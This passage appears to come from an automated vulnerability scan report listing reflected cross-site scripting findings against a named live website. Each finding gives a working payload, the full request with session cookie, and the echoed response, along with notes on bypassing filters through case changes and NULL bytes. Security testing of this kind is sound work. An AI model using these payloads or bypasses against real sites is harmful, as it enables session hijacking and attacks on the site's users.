...[SNIP]...

2.4913. http://www.resellerbase.com/upgrade.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/upgrade.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 3d0c3<img%20src%3da%20onerror%3dalert(1)>5b96e6435c1f8f893 was submitted in the query parameter. This input was echoed as 3d0c3<img src=a onerror=alert(1)>5b96e6435c1f8f893 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php?query=555-555-0199@example.com3d0c3<img%20src%3da%20onerror%3dalert(1)>5b96e6435c1f8f893&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<b>555-555-0199@example.com3d0c3<img src=a onerror=alert(1)>5b96e6435c1f8f893</b>
...[SNIP]...

2.4914. http://www.resellerbase.com/upgrade.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/upgrade.php

Issue detail

The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload eccb6</title><img%20src%3da%20onerror%3dalert(1)>6dbd7814726de50f0 was submitted in the query parameter. This input was echoed as eccb6</title><img src=a onerror=alert(1)>6dbd7814726de50f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php?query=555-555-0199@example.comeccb6</title><img%20src%3da%20onerror%3dalert(1)>6dbd7814726de50f0&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-555-0199@example.comeccb6</title><img src=a onerror=alert(1)>6dbd7814726de50f0</title>
...[SNIP]...

2.4915. http://www.resellerbase.com/upgrade.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/upgrade.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c3f6<script>alert(1)</script>a87d4aa083f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /upgrade.php7c3f6<script>alert(1)</script>a87d4aa083f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /upgrade.php7c3f6<script>alert(1)</script>a87d4aa083f/ was not found on this server.</p>
...[SNIP]...

2.4916. http://www.resellerbase.com/user_detail.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8d77<a>bc8a110f9f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.phpe8d77<a>bc8a110f9f6?u=erammequetern HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:07:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_detail.phpe8d77<a>bc8a110f9f6?u=erammequetern was not found on this server.</p>
...[SNIP]...

2.4917. http://www.resellerbase.com/user_detail.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 896d4<script>alert(1)</script>19318484e20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_detail.php896d4<script>alert(1)</script>19318484e20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_detail.php896d4<script>alert(1)</script>19318484e20 was not found on this server.</p>
...[SNIP]...

2.4918. http://www.resellerbase.com/user_detail.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 777fd<ScRiPt>alert(1)</ScRiPt>c80b932e2c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /user_detail.php777fd<ScRiPt>alert(1)</ScRiPt>c80b932e2c3?u=creeftmic HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_detail.php777fd<ScRiPt>alert(1)</ScRiPt>c80b932e2c3?u=creeftmic was not found on this server.</p>
...[SNIP]...

2.4919. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0021973"%20style%3dx%3aexpr/**/ession(alert(1))%2012eb50242e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21973\" style=x:expr/**/ession(alert(1)) 12eb50242e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /user_detail.php?u=pingpo/%0021973"%20style%3dx%3aexpr/**/ession(alert(1))%2012eb50242e8nger HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=pingpo/\021973\" style=x:expr/**/ession(alert(1)) 12eb50242e8nger">
...[SNIP]...

2.4920. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6c77b<img%20src%3da%20onerror%3dalert(1)>9b2bc159d33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c77b<img src=a onerror=alert(1)>9b2bc159d33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=1sta/6c77b<img%20src%3da%20onerror%3dalert(1)>9b2bc159d33ltor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>1sta/6c77b<img src=a onerror=alert(1)>9b2bc159d33ltor</b>
...[SNIP]...

2.4921. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 66327<x%20style%3dx%3aexpr/**/ession(alert(1))>aa85b88a4f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66327<x style=x:expr/**/ession(alert(1))>aa85b88a4f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /user_detail.php?u=prodayt/66327<x%20style%3dx%3aexpr/**/ession(alert(1))>aa85b88a4f1ovar HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>prodayt/66327<x style=x:expr/**/ession(alert(1))>aa85b88a4f1ovar</b>
...[SNIP]...

2.4922. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab481<x%20style%3dx%3aexpr/**/ession(alert(1))>965db799b2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab481<x style=x:expr/**/ession(alert(1))>965db799b2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=rulacru/ab481<x%20style%3dx%3aexpr/**/ession(alert(1))>965db799b2csbal HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>rulacru/ab481<x style=x:expr/**/ession(alert(1))>965db799b2csbal</b>
...[SNIP]...

2.4923. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0090715<img%20src%3da%20onerror%3dalert(1)>90e5d718130 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90715<img src=a onerror=alert(1)>90e5d718130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /user_detail.php?u=hed/%0090715<img%20src%3da%20onerror%3dalert(1)>90e5d718130icky HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:03:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>hed/\090715<img src=a onerror=alert(1)>90e5d718130icky</b>
...[SNIP]...

2.4924. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4177"%20style%3dx%3aexpression(alert(1))%20a7f45314bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4177\" style=x:expression(alert(1)) a7f45314bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=foxyladyt/b4177"%20style%3dx%3aexpression(alert(1))%20a7f45314bfexas HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:05:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=foxyladyt/b4177\" style=x:expression(alert(1)) a7f45314bfexas">
...[SNIP]...

2.4925. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68115"><img%20src%3da%20onerror%3dalert(1)>9a729812136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68115\"><img src=a onerror=alert(1)>9a729812136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=1sta/68115"><img%20src%3da%20onerror%3dalert(1)>9a729812136ltor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=1sta/68115\"><img src=a onerror=alert(1)>9a729812136ltor">
...[SNIP]...

2.4926. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437a2"%20a%3db%20b9b0dbcc88e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 437a2\" a=b b9b0dbcc88e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=tager/437a2"%20a%3db%20b9b0dbcc88eorry HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=tager/437a2\" a=b b9b0dbcc88eorry">
...[SNIP]...

2.4927. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c7e7"><a>f2367450f8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c7e7\"><a>f2367450f8a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=prodayt/1c7e7"><a>f2367450f8aovar HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=prodayt/1c7e7\"><a>f2367450f8aovar">
...[SNIP]...

2.4928. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff0b"><a>53c218f041d was submitted in the u parameter. This input was echoed as 9ff0b\"><a>53c218f041d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=trikkegallillie9ff0b"><a>53c218f041d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=trikkegallillie9ff0b\"><a>53c218f041d">
...[SNIP]...

2.4929. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1f1f"><a%20b%3dc>4913079adb5 was submitted in the u parameter. This input was echoed as f1f1f\"><a b=c>4913079adb5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /user_detail.php?u=sungak%00f1f1f"><a%20b%3dc>4913079adb5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=sungak\0f1f1f\"><a b=c>4913079adb5">
...[SNIP]...

2.4930. http://www.resellerbase.com/user_detail.php [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload 1f42d<img%20src%3da%20onerror%3dalert(1)>48035a379b2 was submitted in the u parameter. This input was echoed as 1f42d<img src=a onerror=alert(1)>48035a379b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=admin1f42d<img%20src%3da%20onerror%3dalert(1)>48035a379b2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
